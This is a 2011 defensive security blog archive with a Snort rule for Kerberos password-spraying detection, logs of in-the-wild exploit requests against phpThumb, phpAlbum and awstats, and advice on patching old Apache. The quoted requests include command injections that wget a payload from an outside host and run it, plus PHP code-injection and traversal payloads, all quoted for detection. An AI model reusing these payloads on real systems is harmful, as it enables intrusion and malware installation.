28 December 2011

Defeat Domain User Spraying & Brute Forcing of Passwords

A while back, LaNMaSteR53 (Tim Tomes) discussed a method for brute forcing domain default passwords while avoiding account lockout.  This discussion was in response to a video by Dave Hoelzer on using PowerShell to hack domain user accounts. 

The method proposed by LaNMaSteR53 relied on connecting to the IPC$ share of a domain controller.  While there is a discussion to be had regarding the use of administrative shares, we will table that for now and focus instead on defeating LaNMaSteR53 and his desire to control our network. 
Perhaps the most obvious way to detect this would be to review the Windows Security Event Logs on your Active Directory domain controllers.  But if LaNMaSteR53 is successful, he will eventually gain domain admin privileges and cover his tracks.  Unless you are pumping your Windows Security Event Logs in real time into a SIEM system of some sort and correlating on failed logon attempts, chances are you may not see the activity at all, or you may not detect it until it is too late.  So, how can you defeat or detect this activity without a snazzy, expensive SIEM system?
One way would be via an Intrusion Detection System (IDS) such as the open source Snort product.  With a pretty simple rule, you can monitor responses sent from your Active Directory domain controllers to clients requesting authentication.  If the count of all failed authentication attempts from any given client in your enterprise exceeds a certain threshold in a specified period of time, you may be under attack even if you do not have a large number of disabled user accounts, etc. 
If an organization locks user accounts after, say, 5 failed logon attempts, one might choose to configure a rule to look for more than 4 failed logon attempts from a single client in a period of 2 minutes.  The following Snort rule accomplishes this purpose:
alert tcp any 88 -> any any (msg:"Possible domain user spraying detected"; \
flow:established, to_client; \
content:"|05|"; offset:14; depth:15; \
content:"|1e|"; distance:4; within:1; \
content:"|18|"; distance:30; within:1; \
detection_filter:track by_dst, count 4, seconds 120; \
reference:url,foxtrot7security.blogspot.com/2011/12/defeat-domain-user-spraying-brute_28.html; \
classtype:attempted-user; \
sid:1700000; \
rev:0;)

Like a lot of things in security, you may end up with some false positives.  Some tuning of the “count” and “seconds” thresholds based on your local environment should cut out most of the noise while allowing you to detect truly malicious activity. 
Now for the truly curious who are asking the question, “So how does this rule work?”… 
Microsoft adopted Kerberos as the preferred authentication protocol for Windows 2000 and subsequent Active Directory domains.  While a comprehensive discussion of Kerberos 5 is beyond the scope of this post, there is a good Microsoft TechNet article that explains it pretty well.  Kerberos 5 is also defined in RFC 4120.
By default, Microsoft Active Directory has a Kerberos feature called pre-authentication enabled.  Pre-authentication makes offline password guessing attacks very difficult, and during user authentication a Kerberos error is generated if an invalid user password is presented as part of the pre-authentication process.  The error generated in this case is KDC_ERR_PREAUTH_FAILED.  This error code is set within the context of a KRB-ERROR structure, which is defined in the RFC as follows: 
   KRB-ERROR ::= [APPLICATION 30] SEQUENCE {
           pvno            [0] INTEGER (5),
           msg-type        [1] INTEGER (30),
           ctime           [2] KerberosTime OPTIONAL,
           cusec           [3] Microseconds OPTIONAL,
           stime           [4] KerberosTime,
           susec           [5] Microseconds,
           error-code      [6] Int32,
           crealm          [7] Realm OPTIONAL,
           cname           [8] PrincipalName OPTIONAL,
           realm           [9] Realm -- service realm --,
           sname           [10] PrincipalName -- service name --,
           e-text          [11] KerberosString OPTIONAL,
           e-data          [12] OCTET STRING OPTIONAL }

These responses are delivered from the KDC (aka the targeted domain controller) to the client via TCP port 88, which is the registered port for Kerberos.  All we need to do is inspect the packets returned to the client for the proper pvno (protocol version number), msg-type and error-code to be able to detect a failed login.  Then we simply count the number of failed logins against our threshold values for count and seconds and, voilà, we know what is going on in our network! 

So how does this work via the Snort rule presented?  First, we start with a packet capture of a failed login and look for the packet containing the KDC_ERR_PREAUTH_FAILED message.  The payload might look something like this: 

0000        00 00 00 e5 7e 81  e2 30 81 df a0 03 02 01   ......~. .0......
0010  05 a1 03 02 01 1e a4 11  18 0f 32 30 31 31 31 32   ........ ..201112
0020  32 31 32 31 31 30 35 39  5a a5 05 02 03 0e cb ab   21211059 Z.......
0030  a6 03 02 01 18 a9 06 1b  04 58 58 61 64 aa 19 30   ........ .XXad..0
0040  17 a0 03 02 01 02 a1 10  30 0e 1b 06 6b 72 62 74   ........ 0...krbt
0050  67 74 1b 04 58 58 61 64  ac 81 90 04 81 8d 30 81   gt..XXad ......0.
0060  8a 30 49 a1 03 02 01 0b  a2 42 04 40 30 3e 30 09   .0I..... .B.@0>0.
0070  a0 03 02 01 17 a1 02 04  00 30 0a a0 04 02 02 ff   ........ .0......
0080  7b a1 02 04 00 30 09 a0  03 02 01 80 a1 02 04 00   {....0.. ........
0090  30 1a a0 03 02 01 03 a1  13 04 11 58 58 41 44 2e   0....... ...XXAD.
00a0  58 58 2e 43 4f 4d 6f 6f  6f 66 75 73 30 3d a1 03   XX.COMdo ofus0=..
00b0  02 01 13 a2 36 04 34 30  32 30 05 a0 03 02 01 17   ....6.40 20......
00c0  30 06 a0 04 02 02 ff 7b  30 05 a0 03 02 01 80 30   0......{ 0......0
00d0  1a a0 03 02 01 03 a1 13  1b 11 58 58 41 44 2e 58   ........ ..XXAD.X
00e0  58 2e 43 4f 4d 64 6f 6f  66 75 73                  X.COMdoo fus   

One hint:  Wireshark understands Kerberos packets (and many other protocols too!) and makes this much easier and far more understandable.  Hence, using Wireshark is highly recommended when doing protocol analysis.

Let’s look at our rule again and break down the important parts in the context of the packet.  We start with:
alert tcp any 88 -> any any (msg:"Possible domain user spraying detected"; \
We are looking at “any” IP sending traffic on tcp port 88 since we are inspecting Kerberos traffic.  The directional arrow specifies that we are looking for traffic that originates on tcp port 88.  (More advanced topic:  you could improve rule performance by defining a Snort variable that contains only your domain controllers and using it in place of the first “any”.  Your sensors would have less traffic to inspect that way!)
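For example, you could add something like this to snort.conf (the variable name and addresses below are placeholders for your own domain controllers; older Snort versions use var instead of ipvar):

ipvar DC_SERVERS [192.168.1.10,192.168.1.11]

and then change the rule header to:

alert tcp $DC_SERVERS 88 -> any any (msg:"Possible domain user spraying detected"; \

with the rest of the rule body unchanged.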

The next line says that the communication should be part of an established TCP session between the client and the server and that the response traffic should be destined for the client from the server:

flow:established, to_client; \

Now we start our content inspection.  Skipping the first 14 bytes of the packet (the 4-byte record length used for Kerberos over TCP plus the ASN.1 tag and length bytes that precede the pvno value, all defined in the RFC) we can find our protocol version number, or pvno.  We expect this value to be hexadecimal “05” since we are inspecting Kerberos version 5 traffic. 

content:"|05|"; offset:14; depth:15; \

Moving deeper into the packet, we find the msg-type field and look for a decimal value of 30 as specified in the RFC snippet shown above.  Expressed in hexadecimal, this value is “1e”.  If we get this value, we know that we are now dealing with a Kerberos 5 error message. 

content:"|1e|"; distance:4; within:1; \

At this point, we need only make sure we have found the pre-authentication failure.  Buried deeper in the packet, 30 bytes beyond the msg-type field, we find the error-code field, which should contain a decimal value of 24 if this is a pre-authentication failure.  This corresponds to a hexadecimal value of “18”. 

content:"|18|"; distance:30; within:1; \

And to track how many responses are going to a client, we use the following line: 

detection_filter:track by_dst, count 4, seconds 120; \

The track by_dst says to start a new set of counters for each client IP requesting authentication.  Count and seconds are our thresholds for alerting.  Remember, we will actually alert on the 5th failed authentication attempt if we specify a count of 4 because this is saying MORE than 4 detected events. 

I didn’t spell it out above, but there really is a method to the madness when you are creating these types of rules: 

1. Make sure you understand the problem you want to solve.
2. Capture traffic that illustrates the problem.
3. Look at the traffic and understand it thoroughly based on the protocol definition.  Make sure you understand the traffic flow characteristics and directional nature of the traffic.
4. Identify anything in the traffic that would allow you to spot the problem you are trying to solve.
5. Write a rule using what you have learned.
6. Test and implement the rule once you know that it captures the traffic you want.

Above all, don’t get impatient when doing your research.  This is hard work and requires a pretty detailed level of understanding.  You will often need hours of time to solve a single problem, especially if you are not intimately familiar with the protocol or process in question. 

With that, I am signing off for 2011.  Hope everyone has a safe and happy 2012. 

22 December 2011

New attempts to exploit old phpthumb vulnerabilities

After several weeks of heavy scanning for awstats vulnerabilities that reminded us of the importance of patching, followed by scanners trying to exploit phpAlbum vulnerabilities, we have now seen thousands of attempts to exploit a phpthumb vulnerability first reported by Secunia in April 2010 as CVE-2010-1598.   (Hey, give these guys some credit… they started out using the awstats vulnerability that was first discovered in 2006… maybe we should call this progress?)

The vulnerability text states that it is applicable to phpthumb versions <= 1.7.9.  The current version, 1.7.11, is available for download from the phpThumb project site.  If you are using phpthumb, upgrade to the latest version to avoid becoming a victim.  

The requests I have seen are typically as follows:  

GET /admin/phpthumb/phpthumb.php?fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; & src=file.jpg & phpThumbDebug=9

GET /lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; & phpThumbDebug=9  
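If you want to sweep your own access logs for this activity, a quick Python sketch along these lines will do.  The patterns are educated guesses keyed to the requests above (the “fltr[]=blur|” trick used to smuggle shell commands through to ImageMagick), not a complete signature set, and the log path in the usage example is just that, an example.

#!/usr/bin/env python3
# Flag phpThumb command-injection attempts like the ones above in an
# Apache-style access log.  Patterns are illustrative only.

import re
import sys

phpthumb = re.compile(r'phpthumb\.php\?', re.I)                  # the target script
blur_fltr = re.compile(r'fltr(\[\]|%5[bB]%5[dD])=blur', re.I)    # vulnerable filter param
shellish = re.compile(r'(wget|curl|chmod|killall|/tmp/)', re.I)  # injected commands

with open(sys.argv[1], errors="replace") as log:
    for line in log:
        if phpthumb.search(line) and blur_fltr.search(line) and shellish.search(line):
            print(line.rstrip())

Run it as, e.g., python3 phpthumb_scan.py /var/log/apache2/access.log, adjusting the path for your environment.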

IPs seen today were as follows:

91.121.61.223
202.131.87.70


19 December 2011

Attacks against awstats also include attacks against phpAlbum

Following up on a post from last Friday regarding the importance of patching, I thought I would provide an update on the activity we are seeing from the various folks running scans for the awstats vulnerabilities previously mentioned.  It seems that in addition to looking for the various awstats vulnerabilities, the scanners have now added probes for phpAlbum vulnerabilities that were disclosed on Exploit DB at the end of October. 

If you look at the requests made of main.php (below), you can see that the scanner is trying to do PHP code injection to identify vulnerable systems for later exploitation. According to the phpAlbum web site this bug has already been fixed, but I have not independently verified that information.  That being said, it would seem prudent to upgrade your version of phpAlbum. 

Since phpAlbum is frequently used with Joomla installations, this is probably closely related to similar activity that Ryan Barnett pointed out recently on the SpiderLabs blog. Note that the scanner is also trying a directory traversal attempt with index.php.  (The decoding sketch after the request list shows what a couple of these payloads actually resolve to.) 

GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpalbum/main.php?var1=1'.passthru('id').';&cmd=setquality
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /catalog/
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ[[#0]]
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ
GET /?mod=../../../../../../proc/self/environ[[#0]]
GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /site.php?a={${passthru(chr(105).chr(100))}}
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
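To see what these scanners are actually trying to run, it helps to URL-decode a payload or two.  Here is a small illustrative sketch; the two sample strings are taken verbatim from the list above.

#!/usr/bin/env python3
# URL-decode two of the injected payloads above to see what they really do.

from urllib.parse import unquote

samples = [
    "/apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;",
    "/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d",
]
for s in samples:
    print(unquote(s))

# Output:
#   /apps/phpalbum/main.php?cmd=setquality&var1=1'.passthru('id').';
#   /awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}}
# chr(105).chr(100) is just "id", so both payloads simply run the 'id'
# command -- a harmless probe that tells the scanner code execution works.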


Some additional IPs we have seen involved in this activity are as follows: 

220.162.244.251
218.77.120.135
82.130.140.90
78.46.104.76
202.213.205.172
62.48.74.126
190.196.30.122
209.109.129.166

16 December 2011

The Importance of Patching...

Four days ago, I posted a question on Full Disclosure asking folks if they had seen increased activity related to some old vulnerabilities in the awstats package.  A couple of days ago, SpiderLabs blogged about this and added some of the requests and IPs originating this traffic.  SpiderLabs also advised people to upgrade awstats to avoid becoming victims.  Yesterday, I did some digging and can add a few more IPs to SpiderLabs' original list along with some additional information and advice. 

First, I have seen traffic from the following IPs in addition to those posted by SpiderLabs:
114.32.50.243
124.193.142.249
189.114.94.226
189.19.13.239
190.90.158.146
203.148.85.172
72.252.248.111

And now for the more important part...
If you add the IPs above to those posted by SpiderLabs, you will end up with a total of 64 unique IPs.  Of those, 61 had a service listening on port 80, and 42 of them responded to a wget with HTML that appears representative of legitimate business or end-user content. 

Taking a couple of examples, I see that a few of these servers are sitting on legitimate corporate networks and hosting content related to the business that holds the allocation for the assigned IP.  That being the case, it seems reasonable to assume that at least some of these servers were compromised in some fashion and that their owners did not voluntarily begin running these scans for the awstats package.   A couple of cases in point here…

The HTTP server running on port 80 at IP 118.97.50.11 serves a redirect to a secure web server running on port 443 at the same IP.  While the server running https via port 443 is using a self-signed certificate, the IP itself is allocated to Telkom Indonesia and the application presented indicates that it is the “Telkom Group Knowledge Management System”. 

Another case in point:  the domain www.infolution.fr resolves to 80.248.214.103.  As before, the IP is allocated to Infolution, a French information architecture company. 

I could provide more examples, but you probably get my point.  So, if these guys didn’t voluntarily self-install an awstats scanner, what allowed this to happen?  I am not certain, but I can say that these servers (and many of the others) have something in common:  they are running old versions of Apache.  The first example is running Apache 2.2.3, released in 2006.  The second example is running version 2.2.16, released in mid-2010.  This seems to be a very common condition. 
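For the record, the survey behind these observations needs nothing fancier than a loop that grabs each host's Server header.  A rough Python sketch follows; the addresses shown are placeholders standing in for the published lists.

#!/usr/bin/env python3
# Collect the Server header from each scanning host.  Placeholder IPs; swap
# in the lists published by SpiderLabs and in this post.

import urllib.request

ips = ["203.0.113.10", "203.0.113.20"]

for ip in ips:
    try:
        resp = urllib.request.urlopen("http://%s/" % ip, timeout=10)
        print(ip, resp.headers.get("Server", "(no Server header)"))
    except Exception as exc:
        print(ip, "error:", exc)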

Looking a bit more closely at the 64 IPs, 48 of 64 are confirmed as running Apache.  Of the 48 Apache servers, 41 provide a version number.  Of those 41, only 2 are running the current stable version (2.2.21); the remaining 39 are all running old versions.  Here is the full version breakdown: 

Version   Count   Release Year
2.2.21      2       2011
2.2.15      1       2010
2.2.16      3       2010
2.2.12      1       2009
2.2.11      3       2008
2.2.8       6       2008
2.2.9       3       2008
2.0.61      1       2007
2.2.6       3       2007
1.3.36      1       2006
2.0.59      2       2006
2.2.3       8       2006
2.2.2       3       2006
2.0.52      4       2004

But wait, you say….  What about awstats?  Couldn’t that be what caused this?  Sure, but only 7 of the 64 servers seem to be running awstats at this time.  That doesn’t mean that awstats wasn’t the original problem, but it could just as easily have been Apache, or WordPress, Joomla, PHP or any other application installed on these servers.  Apache just seems to be the most common, and exploiting some ancient Apache bug across a wide range of systems would arguably be easier than cracking each one open using a different vulnerability.  And some of these servers have only a generic Apache instance installed, with no PHP or other applications.  So, in my mind, old Apache seems to be a very common link.  Not conclusive, just common. 

So, I’d add this to SpiderLabs' recommendation:  upgrade your Apache version (and your OS, PHP, WordPress, Joomla, etc., while you are at it).  And if your IP is on the list published by SpiderLabs or in this post, you have a problem.  Follow your incident response plan and clean this up! 

14 December 2011

Track your Google search results with googdiff

Blackhat Search Engine Optimization (SEO) practitioners attempt to change or improve search engine results in ways that are unapproved by the search engines and that often involve deception.  Blackhat SEO techniques can be used to make fraudulent pages appear more prominent, siphoning money from legitimate companies and charities, or to impersonate prominent individuals, ascribing the practitioner's own views or opinions to the targeted individual for economic or political gain.
With 65% of the US market share for Internet search, Google is the de facto authoritative source of information for millions of Americans each day.  Users assume that the links appearing on Google’s first page of search results have a great deal of credibility and relevance.  By paying attention to that first page and carefully noting how the results change for your key search terms, you can more easily determine whether someone is misusing your online identity or overtaking your ranking on Google’s front page and costing you sales.
googdiff helps you monitor your online identity, or the online identity of your business, as revealed by Google’s front-page search results, helping protect you from so-called “Blackhat SEO consultants”.  This utility is available at http://code.google.com/p/googdiff/.
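The underlying idea is simple enough to sketch.  The toy below is not googdiff's actual code; fetch_results() is a stand-in for however you retrieve the first-page result links, and the rest just snapshots today's list and diffs it against the previous run.

#!/usr/bin/env python3
# Toy illustration of the googdiff idea, not its implementation: snapshot the
# first-page results for a search term and diff each run against the last.

import difflib
import pathlib

def fetch_results(term):
    # Stand-in: replace with real retrieval of the first-page result URLs for
    # `term` (e.g., via a search API).  Hardcoded data keeps the sketch runnable.
    return ["http://example.com/result1", "http://example.com/result2"]

def diff_against_snapshot(term, snapshot="results.txt"):
    new = fetch_results(term)
    path = pathlib.Path(snapshot)
    old = path.read_text().splitlines() if path.exists() else []
    for line in difflib.unified_diff(old, new, "previous", "current", lineterm=""):
        print(line)
    path.write_text("\n".join(new))   # save today's results for the next run

diff_against_snapshot("your company name")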